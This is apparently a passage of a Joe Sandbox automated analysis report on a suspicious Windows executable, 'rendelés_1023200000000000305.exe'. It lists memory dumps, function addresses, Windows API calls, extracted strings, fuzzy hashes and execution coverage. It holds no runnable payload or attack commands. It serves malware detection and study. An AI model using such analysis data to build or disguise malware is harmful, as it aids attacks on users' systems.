Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E

Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 00405F89
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 00405F99

Strings

C:\Users\user\Desktop, xrefs: 00405F83

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Analysis Process: rendel#U00e9s_1023200000000000305.exePID: 4956, Parent PID: 3840COMMON

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	95.5%
Signature Coverage:	0%
Total number of Nodes:	66
Total number of Limit Nodes:	4

Executed Functions

Function 357C0040 Relevance: 10.9, Strings: 8, Instructions: 936COMMON

Download Yara Rule

Strings

$]q, xrefs: 357C0CE0
$]q, xrefs: 357C0CC3
$]q, xrefs: 357C0CB7
$]q, xrefs: 357C0D04
$]q, xrefs: 357C0CEC
$]q, xrefs: 357C0D10
p=-5, xrefs: 357C017D
PD-5, xrefs: 357C0645

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: PD-5$p=-5$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3091643723
Opcode ID: 4135e50d3eaae684e05c4833b182d98f07c7d71782724c47a6b69b99f4f67bac
Instruction ID: a88574f90357227a6f51a9435440c2ebf0a3bfa9113b238490d3587cb5b038fd
Opcode Fuzzy Hash: 4135e50d3eaae684e05c4833b182d98f07c7d71782724c47a6b69b99f4f67bac
Instruction Fuzzy Hash: 8D824934A00619CFDB14DF68C594A9DB7F2FF89304F50C6A9D409AB265EB74ED86CB80

Function 357CBCD0 Relevance: 4.3, Strings: 3, Instructions: 578
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o@p, xrefs: 357CBD68
Dq@p, xrefs: 357CBD74
PH]q, xrefs: 357CBF30

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: 0o@p$Dq@p$PH]q
API String ID: 0-3731290017
Opcode ID: 1c7c15b772d4265583cae1ebf91a49c97231c1767d142c38e580a99bccacd8dc
Instruction ID: ef3087984e4afb1bbe6ac0b3ee6851a4d89ab460db80a85f572279dec694f3a8
Opcode Fuzzy Hash: 1c7c15b772d4265583cae1ebf91a49c97231c1767d142c38e580a99bccacd8dc
Instruction Fuzzy Hash: E2227D34B002058FEB04DB68D894A9DB7E6FF89710F1085A9E41ADF362DB75EC46CB91

Function 357CDBF9 Relevance: 2.8, Strings: 2, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 357CDD0F
$]q, xrefs: 357CDCF6

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 043b6ca912b2f0033153d584ece7eca1a6e484fd04d55db2bcbd413e217e505e
Instruction ID: d555967c5172b3a968a640eb995b19bf11d69ed54738575caae326f36d5740db
Opcode Fuzzy Hash: 043b6ca912b2f0033153d584ece7eca1a6e484fd04d55db2bcbd413e217e505e
Instruction Fuzzy Hash: 5FB19170F043548FDB09AB78985466E7BA7BFC8750B15896EE416EB384DE38CC068792

Function 00119BC8 Relevance: 2.8, Instructions: 2828COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 126e6870f1f24e73fc634458234c328721cee380b182cba0f4dfc6b1b06616da
Instruction ID: 056a013588b5556113860c001b3da51a62d7df1db81a778b714200d27840d076
Opcode Fuzzy Hash: 126e6870f1f24e73fc634458234c328721cee380b182cba0f4dfc6b1b06616da
Instruction Fuzzy Hash: 5653F631C10B5A8ACB55EF68C8905E9F7B1FF99300F11C79AE4587B121EB70AAD5CB81

Function 0011CB38 Relevance: 2.6, Instructions: 2592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42dec40e692963ecbafe8b7df88936b1683572935eb393c18d994fb09710d90c
Instruction ID: af3eae1a7e189aab86f1e3fae2cd3d24a56bdd2731c849702953c659c8902cd0
Opcode Fuzzy Hash: 42dec40e692963ecbafe8b7df88936b1683572935eb393c18d994fb09710d90c
Instruction Fuzzy Hash: 66433F31D1061A8ECB15DF68C8906EDF7B1FF99300F15C6AAE459A7211EB70EAC5CB81

Function 357C3F38 Relevance: 2.1, Strings: 1, Instructions: 825COMMON

Download Yara Rule

Strings

p=-5, xrefs: 357C47F7

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: p=-5
API String ID: 0-273782671
Opcode ID: 39f3dd3032eaf843b335e0a04a264fcf62479287d6a87cf68a9386edab8e35c2
Instruction ID: c3ec914aca4f6c6ab1fd8a94d2444d0fa20c3a3a47fa0955408a262009cd78d2
Opcode Fuzzy Hash: 39f3dd3032eaf843b335e0a04a264fcf62479287d6a87cf68a9386edab8e35c2
Instruction Fuzzy Hash: 9B627934A002049FDB14DB68D594A9DB7F3FF88356F5084A9E40AEB395DB75EC86CB80

Function 357C2AF0 Relevance: 1.8, Strings: 1, Instructions: 589COMMON

Download Yara Rule

Strings

$, xrefs: 357C2E33

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: aaef83558478025f822c0db16f04def10ebc492678a7f28f15b86ea3461113d9
Instruction ID: d8be86b12183c0fc0af7931e4236600f829e0b6f57a34812705cc0c0f4b9931a
Opcode Fuzzy Hash: aaef83558478025f822c0db16f04def10ebc492678a7f28f15b86ea3461113d9
Instruction Fuzzy Hash: E822BF35E002158BEB14DFA4C980A9EB7B3FB85354F2084A9D44AAF395DB35DD42CB91

Function 001193F4 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

{24., xrefs: 00119401

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: {24.
API String ID: 0-3714660167
Opcode ID: 3eb4229fe2dd42719877f6c225b667a0bf32af21d837be0f0bff055e8506747c
Instruction ID: 6ce5e05d80b5ea71287c38a11e45c06b57ae0ee77d12ff7d448559fa41274ee3
Opcode Fuzzy Hash: 3eb4229fe2dd42719877f6c225b667a0bf32af21d837be0f0bff055e8506747c
Instruction Fuzzy Hash: 90E16E34A002058FDB18DF68D5A4AADBBF2EF89310F248479E416E7395DB34ED82CB51

Function 00113E40 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vmm, xrefs: 0011408B

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: \Vmm
API String ID: 0-738080011
Opcode ID: 84933fc89a1ba7209887054710ce94d137df713ddccfde2586d62f0f58d96eb0
Instruction ID: adb8f750d92aff7d94fa57b60cd942bec39ce399dc0465b21bcf52e0897bc672
Opcode Fuzzy Hash: 84933fc89a1ba7209887054710ce94d137df713ddccfde2586d62f0f58d96eb0
Instruction Fuzzy Hash: 2F916170E00209DFDF18CFA9C9957EDBBF2AF88714F148139E415A7254EB749986CB82

Function 00119EA5 Relevance: 1.1, Instructions: 1114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3060054cc44d9b24ce67eb953423ad8a7c2bb3194d13dae6a19f5dc465dfd0f6
Instruction ID: 551b6aba384ed80aab2457650a761521776f55946d7808ad86999d0c71a9d734
Opcode Fuzzy Hash: 3060054cc44d9b24ce67eb953423ad8a7c2bb3194d13dae6a19f5dc465dfd0f6
Instruction Fuzzy Hash: 73C2F631D10B1A8ADB54EF68C8805A9F7B1FF99300F11D79AE458B7121EB70AAD5CF81

Function 00114A58 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af1ef2ec5cdb5f6ad48af630d74138a50e3b21fd0678321877b1a2e52d6eaf60
Instruction ID: cc9ac213292c588137383e106d778eaf4ca6f07e767c208e5625d712e179d8dd
Opcode Fuzzy Hash: af1ef2ec5cdb5f6ad48af630d74138a50e3b21fd0678321877b1a2e52d6eaf60
Instruction Fuzzy Hash: 10B15E70E042098FDF18CFA9D9857EDBBF2AF88714F148139D419E7294EB749881CB85

Function 357C8610 Relevance: 14.1, Strings: 11, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 357C87B3
xK, xrefs: 357C89AF
$]q, xrefs: 357C8731
$]q, xrefs: 357C87BF
$]q, xrefs: 357C87E8
$]q, xrefs: 357C8790
$]q, xrefs: 357C8784
$]q, xrefs: 357C873D
$]q, xrefs: 357C87DC
hP-5, xrefs: 357C893B
xK, xrefs: 357C8A90

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: hP-5$xK$xK$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-174782968
Opcode ID: fa5e09c24ef84f46637e78dea076cba4ec01cf90a5c0e86fed09f38c28dba198
Instruction ID: 5d5a455a0acb4607f8f1d3587f4b365653f4d092cfef6da82cd380f037a11b1c
Opcode Fuzzy Hash: fa5e09c24ef84f46637e78dea076cba4ec01cf90a5c0e86fed09f38c28dba198
Instruction Fuzzy Hash: 78E15934E102098FDB19DFA8D590A9EB7F7BF85300F10856AD809AF395EB75D846CB81

Function 357CA870 Relevance: 7.1, Strings: 5, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 357CAC67
$]q, xrefs: 357CAC6F
$]q, xrefs: 357CAC7B
(L, xrefs: 357CAA82
(L, xrefs: 357CAD6E

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: (L$(L$$]q$$]q$$]q
API String ID: 0-1144578805
Opcode ID: 8b3d58eb1f94917764b3ee4796520543351c8c16d8fea75e681edfd911d73dde
Instruction ID: 456a702c862ee8a84406ebfd5501e0a79027788db78763c630be6816b62e1428
Opcode Fuzzy Hash: 8b3d58eb1f94917764b3ee4796520543351c8c16d8fea75e681edfd911d73dde
Instruction Fuzzy Hash: D9624C306003068FCB15EF68D590A9EB7E6FF84344B608A68D4599F369DB75ED4BCB80

Function 357C20C0 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J-5, xrefs: 357C22BF
XPbq, xrefs: 357C2211
fbq, xrefs: 357C20EB
J-5, xrefs: 357C2234
\Obq, xrefs: 357C229B

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: fbq$XPbq$\Obq$J-5$J-5
API String ID: 0-3995806709
Opcode ID: f0268e047ab84bb2fa8dc6196f1012b5c29e0e8b39d1a28d8b0d1744c9f07e22
Instruction ID: df82d94035b904c5c6ee4ab25594e7905cdc57741fde394a676f793896dd1b93
Opcode Fuzzy Hash: f0268e047ab84bb2fa8dc6196f1012b5c29e0e8b39d1a28d8b0d1744c9f07e22
Instruction Fuzzy Hash: 90616E34F002199FEB149FA5C854B9EBAF6FB88300F208569E146EB395DF758D428F91

Function 35C92E02 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 35C92E86
GetCurrentThread.KERNEL32 ref: 35C92EC3
GetCurrentProcess.KERNEL32 ref: 35C92F00
GetCurrentThreadId.KERNEL32 ref: 35C92F59

Memory Dump Source

Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b12693cc07236fea3e53fbfa4aaa8f268ff0170d2dc410761fa57efb73881fb8
Instruction ID: 37c98ad9c075cce04a245c57ff446e262415625753ae943d4f12cd1c8b1491cf
Opcode Fuzzy Hash: b12693cc07236fea3e53fbfa4aaa8f268ff0170d2dc410761fa57efb73881fb8
Instruction Fuzzy Hash: 485148B09002098FDB44DFA9D948BDEBBF1FF48314F208459E459B7360D7349985CBA5

Function 35C92E08 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 35C92E86
GetCurrentThread.KERNEL32 ref: 35C92EC3
GetCurrentProcess.KERNEL32 ref: 35C92F00
GetCurrentThreadId.KERNEL32 ref: 35C92F59

Memory Dump Source

Source File: 00000002.00000002.3301671827.0000000035C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_35c90000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f4dbd2bcd1244d82ea10916b0ec257c3feb0fec26adc3dd70c7269b521d356c4
Instruction ID: 433150ee288d275b91d27d8084e01c0a578d08c18715a24cc35046a9a4a44d2f
Opcode Fuzzy Hash: f4dbd2bcd1244d82ea10916b0ec257c3feb0fec26adc3dd70c7269b521d356c4
Instruction Fuzzy Hash: 8D5158B09003098FDB44DFA9D944BDEBBF1FF48314F208459E449A7350DB389981CBA5

Function 00117998 Relevance: 5.6, Strings: 4, Instructions: 553
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<!-5, xrefs: 001179E6
!-5, xrefs: 001179B6
-5, xrefs: 00117F58
$-5, xrefs: 00118078

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: -5$$-5$<!-5$!-5
API String ID: 0-2801827867
Opcode ID: 30ee10eab60bc43532fb71439e2fa19121cec737d269ee3910b21c0d78354cc0
Instruction ID: 2367d3c6d5e4c06e3deb4dd2373bfb888c3b90b9cd4c4fb8b8f58f1e4429cb05
Opcode Fuzzy Hash: 30ee10eab60bc43532fb71439e2fa19121cec737d269ee3910b21c0d78354cc0
Instruction Fuzzy Hash: 00128C30B102028BCB19AB38E4556AC76E6FBC5360F204A79E455DB3A5DF75EC87DB80

Function 357CBCBA Relevance: 4.0, Strings: 3, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0o@p, xrefs: 357CBD68
Dq@p, xrefs: 357CBD74
PH]q, xrefs: 357CBF30

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: 0o@p$Dq@p$PH]q
API String ID: 0-3731290017
Opcode ID: a210d1aa4fdcd8722e2f1d9c86f89940aa8e84ad0bb7cf944d6e74831f5bc433
Instruction ID: a1b0ea169a44737e3fd10e4d6434da19c8194bf886e32a680f8689654312c370
Opcode Fuzzy Hash: a210d1aa4fdcd8722e2f1d9c86f89940aa8e84ad0bb7cf944d6e74831f5bc433
Instruction Fuzzy Hash: 1C8155347502008FDB44DF28D998E9DBBE6FF89310B6185A9E40ADB362DB75EC06CB50

Function 357C20B1 Relevance: 3.9, Strings: 3, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPbq, xrefs: 357C2211
fbq, xrefs: 357C20EB
J-5, xrefs: 357C2234

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: fbq$XPbq$J-5
API String ID: 0-1230702270
Opcode ID: 6b3f0818ae0399372f4f92268da78f044a020fdb5ef284512b7a8bb2608a7f45
Instruction ID: db4209a881b7bd39e48256db326d9950bd31172840a2cb81d0aea9323a845713
Opcode Fuzzy Hash: 6b3f0818ae0399372f4f92268da78f044a020fdb5ef284512b7a8bb2608a7f45
Instruction Fuzzy Hash: D1518030F002099FEB549FA5C854B9EBBF6FF88700F208529E146AB395DF758D468B81

Function 00116E9B Relevance: 2.6, Strings: 2, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR]q, xrefs: 00116ECE
LR]q, xrefs: 00116F67

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: LR]q$LR]q
API String ID: 0-3917262905
Opcode ID: 484252058c01ea409028625bdc0c00e43e525a01f1e20dd078eb25f69ddacd93
Instruction ID: 32deb20d59592c0f8fd8078e8435859061dcf161ab64817fed2352c11033fcd1
Opcode Fuzzy Hash: 484252058c01ea409028625bdc0c00e43e525a01f1e20dd078eb25f69ddacd93
Instruction Fuzzy Hash: EB51E430E143169FDB19DFB9D4646AEBBB1EF86300F10847AE405EB291EB719C86CB41

Function 0011F21B Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

\--5, xrefs: 0011F355
\--5, xrefs: 0011F2ED

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: \--5$\--5
API String ID: 0-425160104
Opcode ID: efa462c56763b62d66f2c28445c2173ef3bb719097bce18fe662b01e27f7abf7
Instruction ID: 2ee441d710eafdb72f461b2e3ec6cc5cf99ffc69edf5171ebe92e6c74d5047c3
Opcode Fuzzy Hash: efa462c56763b62d66f2c28445c2173ef3bb719097bce18fe662b01e27f7abf7
Instruction Fuzzy Hash: F8419135E142068FCB19CBA4C45469EBBF2AF89310F14857AE815E7351DB70DC87CB51

Function 001192E1 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

\--5, xrefs: 0011937D
\--5, xrefs: 001193BC

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: \--5$\--5
API String ID: 0-425160104
Opcode ID: d813c8979504257f8bd20a42b4d04bffde40a3507fbb8ea5bbd1e94883d68388
Instruction ID: 9c81cd4ad212b634de9881b70f9dd9753fbfe8c3449be1f207604b6d5a4bfdb2
Opcode Fuzzy Hash: d813c8979504257f8bd20a42b4d04bffde40a3507fbb8ea5bbd1e94883d68388
Instruction Fuzzy Hash: 16318431E142459FCB09CF74C4646DEFBB2BF86300F15C66AE866EB291D7709986CB90

Function 0011F250 Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

\--5, xrefs: 0011F355
\--5, xrefs: 0011F2ED

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: \--5$\--5
API String ID: 0-425160104
Opcode ID: 89098d2403fe87e955d9322180a2cf90e138193d7815ec5cfe0160489d08c1ac
Instruction ID: 19434a08e6f1f499647db9623f628fd4144f898b3bcad8a4b0ef8533a4d12075
Opcode Fuzzy Hash: 89098d2403fe87e955d9322180a2cf90e138193d7815ec5cfe0160489d08c1ac
Instruction Fuzzy Hash: 80315E35E106059BCB19CFA4C454A9EBBF6BF89310F108529E856E7390DB70EC87CB50

Function 0011F260 Relevance: 2.6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

\--5, xrefs: 0011F355
\--5, xrefs: 0011F2ED

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: \--5$\--5
API String ID: 0-425160104
Opcode ID: cb4720be6d58fba49e7ca755a9497992073b52d967cc0df4c878d3ccdad9415b
Instruction ID: 24011fa830c71b9549b4c3892dde41000ad26569e64104c97a51fe7351a7de78
